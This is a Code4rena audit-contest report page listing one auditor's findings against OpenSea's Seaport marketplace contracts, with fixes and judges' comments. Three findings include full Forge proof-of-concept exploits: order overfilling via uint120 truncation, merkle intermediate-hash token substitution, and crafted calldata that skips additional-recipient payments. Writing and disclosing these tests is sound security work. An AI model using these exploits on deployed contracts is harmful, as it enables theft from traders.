Platform: Code4rena
Start Date: 20/05/2022
Pot Size: $1,000,000 USDC
Total HM: 4
Participants: 59
Period: 14 days
Judge: leastwood
Id: 128
League: ETH
Rank: 3/59
Findings: 5
Award: $132,893.58
π Selected for report: 1
π Solo Findings: 0
22572.5904 USDC - $22,572.59
There's a bug in the partial order filling that allows an attacker to overfill any order (fill more than the total size of the order).
This bug happens because the fractions are stored as uint120
s in _orderStatus
but intermediate computations to scale the fractions to the correct denominator are done in uint256
.
The truncation to uint120
can be used to "reset" an order to the uninitialized state where nothing has been filled yet.
This leads to losses for the offerer as they might sell more NFTs than they intended to or spent more assets on buying NFTs than they submitted with the order.
This clearly breaks partial orders for all users and should be considered high severity.
(The attack can also be turned into a griefing/DoS attack where partial fills overflow such that denominator > numerator
for the _orderStatus
and nobody can fill orders anymore.)
Here's a forge
test (gist) that shows the issue. Alice owns 40 ERC1155s and signs an order to sell only 2 of them. The attacker can overfill the order and buys 4 of her ERC1155s in this example. (They could buy all 40 if they wanted to.)
contract BugOverfill is BaseOrderTest { struct Context { ConsiderationInterface consideration; uint256 tokenId; uint256 tokenAmount; uint256 paymentAmount; address zone; bytes32 zoneHash; uint256 salt; } function testOverfillBug() public resetTokenBalancesBetweenRuns { Context memory context = Context( consideration, 1337, /* tokenId */ 2, /* tokenAmount */ 0.1e18, /* paymentAmount */ address(0), /* zone */ bytes32(0), /* zoneHash */ uint256(0) /* salt */ ); bytes32 conduitKey = bytes32(0); test1155_1.mint( alice, context.tokenId, // alice has a lot more ERC1155 than she's willing to sell context.tokenAmount * 10 ); _configureOfferItem( ItemType.ERC1155, context.tokenId, context.tokenAmount, context.tokenAmount ); // set endAmount to 2 * startAmount _configureEthConsiderationItem(alice, context.paymentAmount); OrderParameters memory orderParameters = OrderParameters( address(alice), context.zone, offerItems, considerationItems, OrderType.PARTIAL_OPEN, block.timestamp, block.timestamp + 1000, context.zoneHash, context.salt, conduitKey, considerationItems.length ); OrderComponents memory orderComponents = getOrderComponents( orderParameters, context.consideration.getNonce(alice) ); bytes32 orderHash = context.consideration.getOrderHash(orderComponents); bytes memory signature = signOrder( context.consideration, alicePk, orderHash ); delete offerItems; delete considerationItems; /*************** ATTACK STARTS HERE ***************/ // @audit Partial Fill 1. These parameters have been hand-crafted to overflow perfectly s.t. we get to the zero state after two partial fills AdvancedOrder memory advancedOrder = AdvancedOrder( orderParameters, // buy 1/2 2**58, /* numerator */ 2**59, /* denominator */ signature, "" ); context.consideration.fulfillAdvancedOrder{ value: context.paymentAmount }(advancedOrder, new CriteriaResolver[](0), bytes32(0)); // @audit Partial Fill 2 that resets totalFilled to zero advancedOrder = AdvancedOrder( orderParameters, // buy 1/2 2**60, /* numerator */ 2**61, /* denominator */ signature, "" ); context.consideration.fulfillAdvancedOrder{ value: context.paymentAmount }(advancedOrder, new CriteriaResolver[](0), bytes32(0)); (, , uint256 totalFilled, uint256 totalSize) = context .consideration .getOrderStatus(orderHash); // @audit notice that we get back to the "uninitialized" state now and could repeat these two steps ad infinitum assertEq(totalFilled, 0); assertEq(totalSize, 0); // @audit Partial Fill 3: for demonstration purposes we do a full-fill here, even though we already partially filled before advancedOrder = AdvancedOrder( orderParameters, 1, /* numerator */ 1, /* denominator */ signature, "" ); context.consideration.fulfillAdvancedOrder{ value: context.paymentAmount }(advancedOrder, new CriteriaResolver[](0), bytes32(0)); // bug: we bought more than the order's total size (context.tokenAmount) assertGt(test1155_1.balanceOf(address(this), context.tokenId), context.tokenAmount); } }
One slightly tricky part of this attack is that the fractions must evenly divide the total order amount. The demonstrated attack works for all cases where the total order size is divisible by 2. For other cases, there also exists a sequence of fills that overflows the
numerator
and allows overfilling.
There are several ways to address this.
The hard part is that the code relies on this scaling so it can add up the fractions.
It's not enough to simply revert if the scaled values (nominator, denominator)
do not fit into a uint120
anymore.
An attacker could try a griefing attack where they fill 2**118/2**119 (1/2)
.
The next user cannot fill orders like 1/3
anymore as it can't be expressed with a denominator of 2**119
(as 2**119
does not divide 3) and choosing any other denominator
would lead to the computation of a scaled denominator larger than uint120.max
.
One probably needs to reduce the final fraction by computing gcd onchain if you keep following this approach - which increases gas cost.
Alternatively, you could let users specify the final fraction, i.e., if it's currently filled 25% and they want to buy 50%, they specify 75% = 3/4
. Then compute the diff to the current fill, make sure it divides evenly etc. and set the _orderStatus
to the parameters. This comes with frontrunning issues.
#0 - HardlyDifficult
2022-06-17T14:46:33Z
Dupe of #77
38226.8801 USDC - $38,226.88
The protocol allows specifying several tokenIds to accept for a single offer.
A merkle tree is created out of these tokenIds and the root is stored as the identifierOrCriteria
for the item.
The fulfiller then submits the actual tokenId and a proof that this tokenId is part of the merkle tree.
There are no real verifications on the merkle proof that the supplied tokenId is indeed a leaf of the merkle tree. It's possible to submit an intermediate hash of the merkle tree as the tokenId and trade this NFT instead of one of the requested ones.
This leads to losses for the offerer as they receive a tokenId that they did not specify in the criteria. Usually, this criteria functionality is used to specify tokenIds with certain traits that are highly valuable. The offerer receives a low-value token that does not have these traits.
Alice wants to buy either NFT with tokenId 1 or tokenId 2.
She creates a merkle tree of it and the root is hash(1||2) = 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e0
.
She creates an offer for this criteria.
An attacker can now acquire the NFT with tokenId 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e0
(or, generally, any other intermediate hash value) and fulfill the trade.
One might argue that this attack is not feasible because the provided hash is random and tokenIds are generally a counter. However, this is not required in the standard.
"While some ERC-721 smart contracts may find it convenient to start with ID 0 and simply increment by one for each new NFT, callers SHALL NOT assume that ID numbers have any specific pattern to them, and MUST treat the ID as a 'black box'." EIP721
Neither do the standard OpenZeppelin/Solmate implementations use a counter. They only provide internal
_mint(address to, uint256 id)
functions that allow specifying an arbitraryid
. NFT contracts could let the user choose the token ID to mint, especially contracts that do not have any linked off-chain metadata like Uniswap LP positions. Therefore, ERC721-compliant token contracts are vulnerable to this attack.
Here's a forge
test (gist) that shows the issue for the situation mentioned in Example.
contract BugMerkleTree is BaseOrderTest { struct Context { ConsiderationInterface consideration; bytes32 tokenCriteria; uint256 paymentAmount; address zone; bytes32 zoneHash; uint256 salt; } function hashHashes(bytes32 hash1, bytes32 hash2) internal returns (bytes32) { // see MerkleProof.verify bytes memory encoding; if (hash1 <= hash2) { encoding = abi.encodePacked(hash1, hash2); } else { encoding = abi.encodePacked(hash2, hash1); } return keccak256(encoding); } function testMerkleTreeBug() public resetTokenBalancesBetweenRuns { // Alice wants to buy NFT ID 1 or 2 for token1. compute merkle tree bytes32 leafLeft = bytes32(uint256(1)); bytes32 leafRight = bytes32(uint256(2)); bytes32 merkleRoot = hashHashes(leafLeft, leafRight); console.logBytes32(merkleRoot); Context memory context = Context( consideration, merkleRoot, /* tokenCriteria */ 1e18, /* paymentAmount */ address(0), /* zone */ bytes32(0), /* zoneHash */ uint256(0) /* salt */ ); bytes32 conduitKey = bytes32(0); token1.mint(address(alice), context.paymentAmount); // @audit assume there's a token where anyone can acquire IDs. smaller IDs are more valuable // we acquire the merkle root ID test721_1.mint(address(this), uint256(merkleRoot)); _configureERC20OfferItem( // start, end context.paymentAmount, context.paymentAmount ); _configureConsiderationItem( ItemType.ERC721_WITH_CRITERIA, address(test721_1), // @audit set merkle root for NFTs we want to accept uint256(context.tokenCriteria), /* identifierOrCriteria */ 1, 1, alice ); OrderParameters memory orderParameters = OrderParameters( address(alice), context.zone, offerItems, considerationItems, OrderType.FULL_OPEN, block.timestamp, block.timestamp + 1000, context.zoneHash, context.salt, conduitKey, considerationItems.length ); OrderComponents memory orderComponents = getOrderComponents( orderParameters, context.consideration.getNonce(alice) ); bytes32 orderHash = context.consideration.getOrderHash(orderComponents); bytes memory signature = signOrder( context.consideration, alicePk, orderHash ); delete offerItems; delete considerationItems; /*************** ATTACK STARTS HERE ***************/ AdvancedOrder memory advancedOrder = AdvancedOrder( orderParameters, 1, /* numerator */ 1, /* denominator */ signature, "" ); // resolve the merkle root token ID itself CriteriaResolver[] memory cr = new CriteriaResolver[](1); bytes32[] memory proof = new bytes32[](0); cr[0] = CriteriaResolver( 0, // uint256 orderIndex; Side.CONSIDERATION, // Side side; 0, // uint256 index; (item) uint256(merkleRoot), // uint256 identifier; proof // bytes32[] criteriaProof; ); uint256 profit = token1.balanceOf(address(this)); context.consideration.fulfillAdvancedOrder{ value: context.paymentAmount }(advancedOrder, cr, bytes32(0)); profit = token1.balanceOf(address(this)) - profit; // @audit could fulfill order without owning NFT 1 or 2 assertEq(profit, context.paymentAmount); } }
Usually, this is fixed by using a type-byte that indicates if one is computing the hash for a leaf or not. An elegant fix here is to simply use hashes of the tokenIds as the leaves - instead of the tokenIds themselves. (Note that this is the natural way to compute merkle trees if the data size is not already the hash size.) Then compute the leaf hash in the contract from the provided tokenId:
function _verifyProof( uint256 leaf, uint256 root, bytes32[] memory proof ) internal pure { bool isValid; - assembly { - let computedHash := leaf + bytes32 computedHash = keccak256(abi.encodePacked(leaf)) ...
There can't be a collision between a leaf hash and an intermediate hash anymore as the former is the result of hashing 32 bytes, while the latter are the results of hashing 64 bytes.
Note that this requires off-chain changes to how the merkle tree is generated. (Leaves must be hashed first.)
#0 - 0xleastwood
2022-06-22T19:14:48Z
The attack outlined by the warden showcases how an intermediate node of a proof can be used as leaves, potentially allowing the attacker to resolve the merkle tree to a different tokenId
. I think in the majority of cases, this will not allow users to trade on invalid tokenIds
, however, considering the ERC721
specification does not enforce a standard for how NFTs are represented using tokenIds
, the issue has some legitimacy. Because of this, I believe medium
severity to be justified.
#1 - liveactionllama
2022-08-30T15:16:45Z
Per @0age resolved via: https://github.com/ProjectOpenSea/seaport/pull/316
63711.4668 USDC - $63,711.47
The _assertConsiderationLengthIsNotLessThanOriginalConsiderationLength
call is off-by-one for the parameters.additionalRecipients.length + 1
.
// requires parameters.additionalRecipients.length + 1 >= parameters.totalOriginalAdditionalRecipients _assertConsiderationLengthIsNotLessThanOriginalConsiderationLength( parameters.additionalRecipients.length + 1, parameters.totalOriginalAdditionalRecipients );
The code is essentially a require
statement checking parameters.additionalRecipients.length + 1 >= parameters.totalOriginalAdditionalRecipients
.
If parameters.totalOriginalAdditionalRecipients == 1
, then parameters.additionalRecipients = []
can be an empty array and the check still passes.
This allows not paying for a consideration item that the offerer specified (their totalOriginalAdditionalRecipients
is one, but we didn't provide any, and it passed) - stealing from the offerer.
Due to technicalities of the current exploit idea (explained below), it's only possible to steal tokens up to the max calldata size. However, it will still be significant for highly-valuable tokens like 8-decimal WBTC. It could also be an ERC20 token that can be redeemed for something valuable, etc. In general, the offerer specifies an ERC20 token and payments for additional recipients that are required for the trade but an attacker can avoid these payments.
The exploit is quite involved because when we remove an item from additionalRecipients
the order-hash is wrong and the signature verification will fail.
However, note that the loop still iterates (from 0
to totalOriginalAdditionalRecipients
) and hashes the memory area using low-level code at additionalRecipients[0]
which is out-of-bounds.
It is indeed possible to place the original additional recipient item at this code location (and have the array length be zero) using some non-standard calldata encoding and compute the correct offer-hash over it.
The next issue is that non-standard calldata encoding now fails in the _assertValidBasicOrderParameterOffsets
but we can fix this by pointing the signature to the expected address which is "additionalRecipients[0]
".
The signature verification would now fail as it uses the additionalRecipients[0]
bytes as the signature, however we can fix this by pre-validating the order through a consideration.validate(ordersToValidate)
call.
In the exploit transaction, the signature bytes do not matter anymore as the signature check is now skipped.
Here's a forge
test (gist) that shows the issue:
Alice wants to sell her NFT for considerationAmount
of a consideration token and specifies an additionalRecipient
that should in addition receive addAmount
of this token. (For example, a royalty, creator fee, or just splitting the funds between two of her accounts, etc.)
The attacker can buy Alice's item by only paying the considerationAmount
but not the additional addAmount
.
contract BugAdditionalRecipients is BaseOrderTest { BasicOrderParameters basicOrderParameters; struct Context { ConsiderationInterface consideration; uint256 tokenId; uint256 considerationAmount; uint256 addAmount; address zone; bytes32 zoneHash; uint256 salt; } function _configureBasicOrderParametersErc20ToErc721(Context memory context) internal returns (OrderParameters memory orderParameters) { // offer 721 and consider ERC20 with additional royalty payments to me basicOrderParameters.offerer = payable(alice); basicOrderParameters.offerToken = address(test721_1); basicOrderParameters.offerIdentifier = context.tokenId; basicOrderParameters.offerAmount = 1; basicOrderParameters.considerationToken = address(token1); basicOrderParameters.considerationIdentifier = 0; basicOrderParameters.considerationAmount = context.considerationAmount; basicOrderParameters.basicOrderType = BasicOrderType .ERC20_TO_ERC721_FULL_OPEN; basicOrderParameters.zone = context.zone; basicOrderParameters.startTime = block.timestamp; basicOrderParameters.endTime = block.timestamp + 100; basicOrderParameters.zoneHash = context.zoneHash; basicOrderParameters.salt = context.salt; basicOrderParameters.offererConduitKey = bytes32(0); basicOrderParameters.fulfillerConduitKey = bytes32(0); basicOrderParameters.totalOriginalAdditionalRecipients = 1; basicOrderParameters.additionalRecipients.push( AdditionalRecipient(context.addAmount, bob) ); // reproduce these same items in a different struct just to sign ... basicOrderParameters.signature = signature; } function testBug() public resetTokenBalancesBetweenRuns { Context memory context = Context( consideration, 42, /* tokenId */ 0xDEAD, /* considerationAmount */ 1e7, /* additionalAmount */ address(0), /* zone */ bytes32(0), /* zoneHash */ uint256(0) /* salt */ ); test721_1.mint(alice, context.tokenId); OrderParameters memory orderParameters = _configureBasicOrderParametersErc20ToErc721( context ); /*************** ATTACK STARTS HERE ***************/ // pre-validate the order hash with the acutal signature Order[] memory ordersToValidate = new Order[](1); ordersToValidate[0] = Order( orderParameters, basicOrderParameters.signature ); bool validated = context.consideration.validate(ordersToValidate); assertTrue(validated); uint256 fulfillerPaid = token1.balanceOf(address(this)); // context.consideration.fulfillBasicOrder(basicOrderParameters); // this would be the normal call where we have to pay `considerationAmount + `additionalAmount` // build our custom calldata, starting with the legitimate calldata bytes memory callData = abi.encodeWithSelector( ConsiderationInterface.fulfillBasicOrder.selector, basicOrderParameters ); // the code iterates up to totalOriginalAdditionalRecipients to compute the orderHash, regardless of additionalRecipients.length // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/BasicOrderFulfiller.sol#L506 // but it only creates transfers for the actual additionalRecipients // as we don't want to pay for the additionalRecipients consideration items, we set its length to zero // the orderHash is still computed correctly as it iterates up to the totalOriginalAdditionalRecipients and does an out-of-bounds read // 0x264 cdPtr (where the offset to the packed var is stored); headPtr = 0x240 callData[BasicOrder_additionalRecipients_length_cdPtr + 31] = 0; // set array length to zero // however, to pass the `_assertValidBasicOrderParameterOffsets` calldata offset checks, we now need `signature` to point to `additionalRecipients[0]` // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/Assertions.sol#L105 callData[BasicOrder_signature_cdPtr + 30] = 0x02; // set it to the value it expects 0x260 = 0x260 + 0 * addRecpSize callData[BasicOrder_signature_cdPtr + 31] = 0x60; // set it to the value it expects 0x260 = 0x260 + 0 * addRecpSize // pad it by context.addAmount so we don't crash when solidity deserializes the signature // as it reads the length from additionalRecipients[0].amount // see https://github.com/code-423n4/2022-05-opensea-seaport/blob/4140473b1f85d0df602548ad260b1739ddd734a5/contracts/lib/BasicOrderFulfiller.sol#L922 // we don't care about the actual values for the signature as the order was pre-validated and code short-circuits, so just increase the length uint256 addAmount = callData.length + context.addAmount; // callData.length = addAmount. use assembly as `length` is read-only assembly { mstore(callData, addAmount) } (bool success, bytes memory returnData) = address(context.consideration) .call{ value: 0 }(callData); if (!success) { if (returnData.length == 0) revert(); assembly { revert(add(32, returnData), mload(returnData)) } } fulfillerPaid -= token1.balanceOf(address(this)); // bug: we only paid for the considerationItem but not for `context.additionalAmount` π assertEq(fulfillerPaid, context.considerationAmount); } }
Fix the call:
_assertConsiderationLengthIsNotLessThanOriginalConsiderationLength( - parameters.additionalRecipients.length + 1, + parameters.additionalRecipients.length, parameters.totalOriginalAdditionalRecipients );
#0 - HardlyDifficult
2022-06-19T16:42:12Z
Dupe of #129
π Selected for report: Spearbit
Also found by: 0xsanson, Chom, IllIllI, OriDabush, Saw-mon_and_Natalie, broccoli, cccz, cmichel, csanuragjain, foobar, hack3r-0m, hickuphh3, hubble, hyh, ilan, kebabsec, mayo, oyc_109, peritoflores, rfa, scaraven, sces60107, shung, sorrynotsorry, tintin, twojoy, zkhorse, zzzitron
7524.761 USDC - $7,524.76
FractionData
's numerator
and denominator
be uint120
as it's in other places?_checkMatchingConsideration
function does not revert on false
, instead the result is assigned to the potentialCandidate.invalidFulfillment
field. But this field can be overwritten with a true
value by aggregating another item that matches in the next loop iteration. This allows trading the offerer's items for useless items by falsely aggregating high-value consideration items. Their amount is set to zero and one does not have to transfer these consideration items. The bug is not present in the YUL version where the _checkMatchingConsideration
always reverts on false
.ReferenceOrderFulfiller.sol
: Should be "Create Received Item from _cancel
and _validate
always return true
. It's misleading as returning a boolean
indicates that this function can also return false
on a failed cancelation/validation (instead of reverting). The return value is useless here as it's always set to true
. Consider removing the return value to make the semantics of these functions more clear and save gas._assertValidSignature
only verifies that v == 27 || v == 28
in the signature.length == 65
case, but not in the signature.length == 64
case. This is inconsistent behavior. For reference, the OZ implementation checks v
in both cases. In practice, this does not seem to be an issue as ecrecover
should revert anyway on invalid v
. However, the BadSignature
error in Seaport is thrown if v == 27 || v == 28
only in one of the two cases. Consider adding the same check to the signature.length == 64
case._performERC721Transfer
function performs a transferFrom
call instead of a safeTransferFrom
call. It could be that to
is a receiver contract which does not accept ERC721 tokens signaled by not implementing onERC721Received
as demanded by the spec. The tokens can get stuck in these contracts. This is generally not a problem if msg.sender
is the to
receiver or when the offerer chose their offer items but it can happen as arbitrary ERC721 transfers can be added as additional consideration items.#0 - HardlyDifficult
2022-06-20T20:40:47Z
π Selected for report: Dravee
Also found by: 0x1f8b, 0x29A, 0xalpharush, Chom, Czar102, Hawkeye, IllIllI, MaratCerby, MiloTruck, NoamYakov, OriDabush, RoiEvenHaim, Spearbit, Tadashi, TerrierLover, TomJ, asutorufos, cccz, cmichel, csanuragjain, defsec, delfin454000, djxploit, ellahi, foobar, gzeon, hake, hickuphh3, ignacio, ilan, joestakey, kaden, mayo, ming, oyc_109, peritoflores, rfa, sach1r0, sashik_eth, shung, sirhashalot, twojoy, zer0dot, zkhorse
857.8758 USDC - $857.88
The data.length != 0 && data.length >= 32
check has a redundancy. As data.length >= 32
is required and data.length >= 32
implies data.length != 0
, one can simplify this expression to data.length >= 32
.
The YUL version of the code checks "(abi.decode(data, uint256) == 1 && data.length > 31) || data.length == 0
" which is correctly optimized.
The ConduitController
computes the _CONDUIT_RUNTIME_CODE_HASH
variable by deploying a Conduit
contract and reading its .codehash
. However, this variable is only used to check if a contract has been deployed by checking conduit.codehash == _CONDUIT_RUNTIME_CODE_HASH
. The conduit
variable is always a create2
address and by the way create2
addresses work, the check can also be implemented as condit.code.length != 0
. (Because the creation code is already part of the create2
address and the creation code always leads to the same runtime code for Conduit
s.)
This saves deploying a Conduit
contract in the constructor and the new check should also be more gas-efficient.
MerkleProof.verify
The MerkleProof.verify
function can be improved using the xor
trick instead of a switch
to order the hashes. Plus some other improvements. Credit
function _verifyProof( uint256 leaf, uint256 root, bytes32[] memory proof ) internal pure { bool isValid; assembly { // Start the hash off as just the starting leaf. let computedHash := leaf // Get memory start location of the first element in proof array. let data := add(proof, OneWord) // Iterate over proof elements to compute root hash. - for { - let end := add(data, mul(mload(proof), OneWord)) - } lt(data, end) { - data := add(data, OneWord) - } { - // Get the proof element. - let loadedData := mload(data) - - // Sort and store proof element and hash. - switch gt(computedHash, loadedData) - case 0 { - mstore(0, computedHash) // Place existing hash first. - mstore(0x20, loadedData) // Place new hash next. - } - default { - mstore(0, loadedData) // Place new hash first. - mstore(0x20, computedHash) // Place existing hash next. - } - - // Derive the updated hash. - computedHash := keccak256(0, TwoWords) - } + for { + // Left shift by 5 is equivalent to multiplying by 0x20. + let end := add(data, shl(5, mload(proof))) + } lt(data, end) { + data := add(data, OneWord) + } { + let loadedData := mload(data) + // Slot of `computedHash` in scratch space. + // If the condition is true: 0x20, otherwise: 0x00. + let scratch := shl(5, gt(computedHash, loadedData)) + + // Store elements to hash contiguously in scratch space. + // Scratch space is 64 bytes (0x00 - 0x3f) and both elements are 32 bytes. + mstore(scratch, computedHash) + mstore(xor(scratch, 0x20), loadedData) + computedHash := keccak256(0, TwoWords) + } // Compare the final hash to the supplied root. isValid := eq(computedHash, root) } // Revert if computed hash does not equal supplied root. if (!isValid) { revert InvalidProof(); } }
#0 - HardlyDifficult
2022-06-26T15:34:19Z
Gas: Unnecessary ERC20 transfer data length check
This impacts the reference implementation which is not a target for optimizations, as the warden notes the optimized Yul version already seems to do the right thing here.
The other 2 recommendations may be worthwhile optimizations to include.